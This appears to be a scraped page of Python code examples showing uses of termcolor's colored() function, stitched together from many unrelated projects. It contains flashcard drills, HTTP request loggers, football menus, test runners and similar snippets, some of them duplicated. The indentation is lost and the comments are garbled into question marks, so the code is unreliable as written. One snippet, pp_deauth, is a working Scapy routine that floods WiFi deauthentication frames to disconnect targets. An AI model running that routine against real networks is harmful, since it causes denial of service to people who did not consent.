def get_diff_with_color(expected: str, ans: str) -> Tuple[str, str]:
d = difflib.Differ()
diff = d.compare(expected, ans)
expected_with_mistake = ""
ans_with_mistake = ""
for e in diff:
if e.startswith("+"):
ans_with_mistake += colored(e[-1], "red")
elif e.startswith("-"):
expected_with_mistake += colored(e[-1], "green")
else:
expected_with_mistake += e[-1]
ans_with_mistake += e[-1]
return expected_with_mistake, ans_with_mistake
python类colored()的实例源码
def print_all_contents(self):
indents = u'\u251c'
spaces = ''
i = 1
while i < self.nesting:
indents += u'\u2500'
spaces += ' '
i += 1
gc.msg(indents + '[' + self.name + ']')
gc.msg(u'\u2502' + spaces + ' D: ' + colored(self.get_subdirs(), 'yellow'))
gc.msg(u'\u2502' + spaces + ' F: ' + colored(self.get_files(), 'white'))
for subdir in self.subdirs:
subdir.print_all_contents()
# permanently delete this directory and its contents
def add_property(self, name, value):
# get filler space between name and value
spaces = ''
i = self.label_width - len(name)
while i > 0:
spaces += ' '
i -= 1
text = colored(u'\u2502 ', self.border_color)
text += colored(name + ':', self.label_color)
text += spaces
text += colored(value, self.text_color)
# add remaining spaces and end line
spaces = ''
i = self.width - len(value) - self.label_width - 4
while i > 0:
spaces += ' '
i -= 1
text += spaces
text += colored(u'\u2502', self.border_color)
self.text.append(text)
# resizes width of labels for property entries
def share(self):
'''Compile a single Rain file into a shared object file.'''
self.build()
if self.compiled:
return
self.compiled = True
self.compile_links()
with self.okay('sharing'):
target = self.target or self.qname + '.so'
clang = os.getenv('CLANG', 'clang')
flags = ['-O2', '-shared', '-fPIC']
cmd = [clang, '-o', target, self.ll] + flags
self.vprint('{:>10} {}', 'target', X(target, 'yellow'))
self.vprint('{:>10} {}', 'flags', X(' '.join(flags), 'yellow'))
self.vprint('{:>10} {}', 'src', X(self.ll, 'yellow'))
subprocess.check_call(cmd)
def line_gen(basedir,chan):
subdir = chan+".chat"
sdpath = os.path.join(basedir,subdir)
fn = max(x for x in os.listdir(sdpath) if x.endswith(".txt"))
path = os.path.join(sdpath,fn)
ch = chan.encode('utf-8')
for x in tail_f(path):
if x == EWOULDBLOCK:
continue
s = x.encode('utf-8')
time,name,rest = split_line(s)
if name[-1] == ':'.encode('utf-8'):
t = colored(time,'cyan',attrs=['bold'])
c = colored(ch,'cyan',attrs=['bold'])
n = colored(name,'red',attrs=['bold'])
r = highlight(rest)
else:
t = colored(time,'cyan')
c = colored(ch,'cyan')
n = colored(name,'yellow',attrs=['dark'])
r = colored(rest,attrs=['dark'])
yield ' '.join((t,c,n,r))
def run(flashcard: Flashcard, hint_rate=None):
n = len(flashcard)
num_collect = 0
for i, card in enumerate(flashcard):
problem = card[0]
expected = card[1]
print("# {:02d}".format(i + 1), problem)
if hint_rate is not None:
print(colored("hint", "blue"), hint(expected, hint_rate))
ans = input(">>>> ")
if expected == ans.strip():
num_collect += 1
print(colored('GOOD', 'green'), colored(expected, "green"))
else:
expected_with_mistake, ans_with_mistake = get_diff_with_color(expected, ans)
print(colored('MISS', 'red'), expected_with_mistake)
print(' ', ans_with_mistake)
print("*" * 100)
print("{}/{}".format(num_collect, n))
def failUnlessException(self, exception_type, logic, *args, **kws):
"""????????????????????????
??????????????
:param logic ?????????
:param args ???????????
:param exception_type ???????
"""
try:
logic(*args, **kws)
except exception_type as e:
print
mark = colored("[Exception message] ", "yellow", attrs=['bold'])
print mark, colored(unicode(e), "yellow")
else:
self.fail(
"Expected exception {} not happened".format(exception_type))
def do_caller_job(self, line):
"""
??????????Job??
:param line ????????? [?????]
"""
cmd_args = re.split(r"\s+", line)
unit_name = cmd_args[0].strip()
if unit_name in self.units:
print colored(u"???? '{}' ????".format(unit_name), "red")
return
if len(cmd_args) >= 2:
func_name = cmd_args[1].strip()
else:
func_name = None
job_tpl = CallerBasedJobTemplate(unit_name, func_name)
self.units.append(job_tpl)
def log_request(self, code='-', size='-'):
msg = self.requestline
code = str(code)
if termcolor:
color = termcolor.colored
if code[0] == '1': # 1xx - Informational
msg = color(msg, attrs=['bold'])
if code[0] == '2': # 2xx - Success
msg = color(msg, color='white')
elif code == '304': # 304 - Resource Not Modified
msg = color(msg, color='cyan')
elif code[0] == '3': # 3xx - Redirection
msg = color(msg, color='green')
elif code == '404': # 404 - Resource Not Found
msg = color(msg, color='yellow')
elif code[0] == '4': # 4xx - Client Error
msg = color(msg, color='red', attrs=['bold'])
else: # 5xx, or any other response
msg = color(msg, color='magenta', attrs=['bold'])
self.log('info', '"%s" %s %s', msg, code, size)
def log_request(self, code='-', size='-'):
msg = self.requestline
code = str(code)
if termcolor:
color = termcolor.colored
if code[0] == '1': # 1xx - Informational
msg = color(msg, attrs=['bold'])
if code[0] == '2': # 2xx - Success
msg = color(msg, color='white')
elif code == '304': # 304 - Resource Not Modified
msg = color(msg, color='cyan')
elif code[0] == '3': # 3xx - Redirection
msg = color(msg, color='green')
elif code == '404': # 404 - Resource Not Found
msg = color(msg, color='yellow')
elif code[0] == '4': # 4xx - Client Error
msg = color(msg, color='red', attrs=['bold'])
else: # 5xx, or any other response
msg = color(msg, color='magenta', attrs=['bold'])
self.log('info', '"%s" %s %s', msg, code, size)
def handle_tcp_default(sk, dstport):
# Attempt to guess protocol according to what the client sends
data = ''
try:
rlist, _, _ = select.select([sk], [], [], 30)
if len(rlist) != 0:
data = sk.recv(20, socket.MSG_PEEK)
except Exception as err:
#print(traceback.format_exc())
pass
if data[:3] in SSL_CLIENT_HELLO_SIGNATURES:
print colored("Guessing this is a SSL/TLS connection, attempting to handshake.", 'red', attrs=['bold'])
handle_tcp_hexdump_ssl(sk, dstport)
elif data.startswith("GET "):
handle_tcp_http(sk, dstport)
elif data.startswith("CONNECT "):
handle_tcp_httpproxy(sk, dstport)
else:
handle_tcp_hexdump(sk, dstport)
sk.close()
# UDP DISPATCHER
def handle_tcp_hexdump(socket, dstport):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
length = 16
c = 0
for chars in recv_and_split_blocks(socket, length):
hexstr = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
print colored("%04x %-*s %-*s" % (c, length*3, hexstr, length, printable), 'red', 'on_yellow')
c += len(chars)
print colored("%04x" % c, 'red', 'on_yellow')
try:
print("-- TCP TRANSPORT CLOSED --")
socket.close()
except:
pass
def display_execution_results(self, results, site):
""" Display execution summary
"""
cprint("|-Execution result", "magenta")
count = 0
for result in results:
plugin_name, stats = result
c = "cyan"
if count % 2:
c = "blue"
name = colored(" |-%15s" % plugin_name, c)
ok = colored("ok:%s"% stats[site.OK], "green")
skip = colored("skip:%s" % stats[site.SKIPPED], "yellow")
err = colored("error:%s" % stats[site.ERROR], "red")
print "%s\t%s\t%s\t%s" % (name, ok, skip, err)
count += 1
def get_img_extension_alternative_naming(extension):
"Return extensions naming for PIL and Mime/type"
web_extension = None
pil_extension_codename = None
if extension.lower() == ".jpg" or extension.lower() == ".jpeg":
pil_extension_codename = "JPEG"
web_extension = "image/jpeg"
elif extension.lower() == ".png":
pil_extension_codename = "PNG"
web_extension = "image/png"
elif extension.lower() == ".gif":
pil_extension_codename = "GIF"
web_extension = "image/gif"
elif extension.lower() == ".webp":
pil_extension_codename = "WEBP"
web_extension = "image/webp"
return [pil_extension_codename, web_extension]
### colored output ###
def colored(text, _):
'''
Returns the supplied text argument unchanged. This is a swap-in
replacement for when termcolor.colored is not available.
:param text: Text to return
:type text: string
:param _: Fake argument, only required to match interface
provided by termcolor.colored
:return: The supplied text, unchanged
:rtype: string
'''
return text
# The types of 'intent' that an argument to a Fortran subroutine
# may have
def run(self):
print _LOGO
args = self._parse_args()
if not os.path.exists(args.path):
print colored(
'Error: {} file do not exists'.format(args.path),
'red'
)
exit(-1)
if not os.path.exists(args.tests):
raise ValueError("Tests not found".format(
args.tests
))
# Find the test suite we need to execute
test_suite = self.__finder.find(args.tests)
# Run the test suite
self.__runner.run(test_suite)
def __executor(self, test):
module_ = test.__module__
class_ = test.im_class.__name__
method_ = test.__name__
full_test_name = "{}.{}.{}".format(
module_, class_, method_
)
print "Testing {}".format(
full_test_name
),
try:
result_ = test()
print colored("\t\tSuccess\r\n", "green")
except Exception, e:
print colored("\t\tFailed\r\n", "red")
print "{}\r\n".format(e)
self.__errors.append((full_test_name, e))
return True
def print_run_table(table_data):
table = SingleTable(table_data)
table.justify_columns = {0: 'left', 1: 'center', 2: 'left'}
table.inner_heading_row_border = False
table.inner_column_border = False
table.outer_border = False
max_width = table.column_max_width(2)
for index, row in enumerate(table_data):
table.table_data[index][2] = str(row[2][0:max_width].splitlines()[0])
if row[1] == 0:
table.table_data[index][1] = colored(str(row[1]), 'green')
elif row[1] == 1:
table.table_data[index][2] = colored(str(row[1]), 'yellow')
elif row[1] == 3:
table.table_data[index][2] = colored(str(row[1]), 'grey')
else:
table.table_data[index][2] = colored(str(row[1]), 'red')
print table.table
def show(self):
print colored("\n Filters", 'yellow', attrs=['bold'])
print " -------"
for key, value in self.filters.iteritems():
if str(self.filters[key]).lower() == "none":
print " |_" + key + " = " + str(value)
else:
print " |_" + colored(key + " = " + str(value), 'green', attrs=['bold'])
print colored("\n Display", 'yellow', attrs=['bold'])
print " -------"
for key, value in self.display.iteritems():
if str(self.display[key]).lower() == "false":
print " |_" + key + " = " + str(value)
else:
print " |_" + colored(key + " = " + str(value), 'green', attrs=['bold'])
print ""
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
attack_start = "[*] Attack has started for " + str(blacklist)
print colored(attack_start, 'red', attrs=['reverse', 'blink'])
time.sleep(2)
channel = 1
for target in blacklist:
clist = sniff(iface=iface, count=50)
channel = find_channel(clist, target)
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=target.lower(), addr3=target.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print colored("[*] Attack has completed..", 'green', attrs=['reverse', 'blink'])
time.sleep(2)
def connect(self):
"""Call to set connection with remote client."""
try:
self.session = paramiko.SSHClient()
self.session.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.session.connect(
self.client_.ip, username=self.client_.user,
password=self.client_.pass_)
self.SFTP = self.session.open_sftp()
except (paramiko.AuthenticationException,
paramiko.ssh_exception.NoValidConnectionsError) as e:
print(colored("> {}".format(e), 'red'))
self.logger.error(e)
sys.exit()
def log_request(self, code='-', size='-'):
msg = self.requestline
code = str(code)
if termcolor:
color = termcolor.colored
if code[0] == '1': # 1xx - Informational
msg = color(msg, attrs=['bold'])
if code[0] == '2': # 2xx - Success
msg = color(msg, color='white')
elif code == '304': # 304 - Resource Not Modified
msg = color(msg, color='cyan')
elif code[0] == '3': # 3xx - Redirection
msg = color(msg, color='green')
elif code == '404': # 404 - Resource Not Found
msg = color(msg, color='yellow')
elif code[0] == '4': # 4xx - Client Error
msg = color(msg, color='red', attrs=['bold'])
else: # 5xx, or any other response
msg = color(msg, color='magenta', attrs=['bold'])
self.log('info', '"%s" %s %s', msg, code, size)
def format_desc(desc, ref_desc, use_colour):
"""
Return potentially colourised string list of descriptor features.
"""
desc, ref_desc = desc_to_str(desc), desc_to_str(ref_desc)
final_string = ""
for string, ref_string in zip(desc.split(","), ref_desc.split(",")):
for char, ref_char in itertools.zip_longest(string, ref_string):
# If a character in the string is identical to the reference
# string, we highlight it in red. That makes it easier to visually
# spot similarities in the descriptors.
if (char == ref_char) and use_colour:
final_string += termcolor.colored(char, "red")
else:
final_string += char if char is not None else " "
final_string += ","
return final_string.split(",")
def choose_method_championsleague(self):
menu = colored("Champions League: \n[1]Group Stage Standings [2]Group Stage Results [3]Results by Group"
" [4]TopScorers [5]Main Menu\n", 'red', attrs=['bold'])
choose_menu = input(menu)
menu_guard = ["1", "2", "3", "4", "5"]
while choose_menu not in menu_guard:
choose_menu = input(menu)
if choose_menu == "1":
for x in range(0,8):
ChampionsLeague.champions_league_groupstage(self, group_stage + groups[x], group_name=groups[x][0])
elif choose_menu == "2":
MatchScores.match_details(self, index=0, league_url=group_stage_topstats, league_name='Champions League')
elif choose_menu == "3":
for x in range(0,8):
cprint("\nRetrieving Match Scores for Champions League Group " + groups[x][0].title(), 'yellow')
MatchScores.match_details(self, index=0, league_url= group_stage + groups[x], league_name="")
elif choose_menu == "4":
TopStats.top_scorers(self, group_stage_topstats, league_name='Champions League')
elif choose_menu == "5":
pass
def choose_method(self, class_name):
menu = colored("Which League do you want?\n[1]EPL [2]Liga BBVA [3]Serie A [4]Ligue 1 "
"[5]Bundesliga [6]Main Menu\n", 'red', attrs=['bold'])
choose_menu = input(menu)
menu_guard = ["1", "2", "3", "4", "5", "6"]
while choose_menu not in menu_guard:
choose_menu = input(menu)
if choose_menu == "1":
ChooseMenu.run_method(self, class_name, epl, league_name='Premier League')
elif choose_menu == "2":
ChooseMenu.run_method(self, class_name, liga, league_name='Liga BBVA')
elif choose_menu == "3":
ChooseMenu.run_method(self, class_name, serie_A, league_name='Serie A')
elif choose_menu == "4":
ChooseMenu.run_method(self, class_name, ligue_1, league_name='Ligue 1')
elif choose_menu == "5":
ChooseMenu.run_method(self, class_name, bundesliga, league_name='Bundesliga')
elif choose_menu == "6":
main()
def apply_rules(ruletype, gcpobjects, descfield, outfile, project):
rules = loadrules(ruletype)
for obj in gcpobjects:
for rule in rules:
if 'filtercondition' in rule:
res = apply_rule_filters(obj, rule['filters'],
rule['filtercondition'])
else:
res = apply_rule_filters(obj, rule['filters'])
if res:
print colored('MATCH:', 'red'), \
"object '%s' matches rule '%s'" \
% (obj[descfield], rule['name'])
with open(outfile, 'a') as f:
f.write(datetime.datetime.now().ctime()
+ ": Project: " + project
+ " | Object: " + obj[descfield]
+ " | Matches rule: " + rule['name']
+ "\n" + json.dumps(obj) + "\n\n")
def init_project(self):
project_dir_git = os.path.join(self._project_dir, 'repo')
if not self._config['repo']:
raise Exception('Empty repo configuration')
create_dir(project_dir_git)
git_path = os.path.join(project_dir_git, '.git')
if os.path.exists(git_path):
repo = Repo(project_dir_git)
print colored('Pulling', 'green') + ' repo %s' % self._config['repo']
repo.remotes.origin.pull()
else:
try:
print 'cloning... %s' % self._config['repo']
Repo.clone_from(self._config['repo'], project_dir_git)
except GitCommandError as e:
print 'Repo cannot be found'
def get_config(config_path=None):
"""
Loads configuration from yaml file
"""
if not config_path:
config_path = os.path.join(
os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
), 'config.yml')
if not os.path.exists(config_path):
print colored("Error: ", "red") + " config path not found %s" % config_path
exit()
with file(config_path) as stream:
return yaml.load(stream)
def execute(self, project):
modified_files = project.diff()
if modified_files:
print '%d files has been modified' % len(modified_files)
for _file in modified_files:
if _file.change_type in ['D', 'M']:
word = 'New' if _file.change_type == 'D' else 'Modified'
print "- %s " % word + colored(_file.file_path, "green")
buffer = open_file(_file.file_path)
try:
self._create_tables(buffer, _file.file_path)
# self.update_lock(project)
except ValueError, e:
raise e
else:
print 'Everything up to date'
def log_request(self, code='-', size='-'):
msg = self.requestline
code = str(code)
if termcolor:
color = termcolor.colored
if code[0] == '1': # 1xx - Informational
msg = color(msg, attrs=['bold'])
if code[0] == '2': # 2xx - Success
msg = color(msg, color='white')
elif code == '304': # 304 - Resource Not Modified
msg = color(msg, color='cyan')
elif code[0] == '3': # 3xx - Redirection
msg = color(msg, color='green')
elif code == '404': # 404 - Resource Not Found
msg = color(msg, color='yellow')
elif code[0] == '4': # 4xx - Client Error
msg = color(msg, color='red', attrs=['bold'])
else: # 5xx, or any other response
msg = color(msg, color='magenta', attrs=['bold'])
self.log('info', '"%s" %s %s', msg, code, size)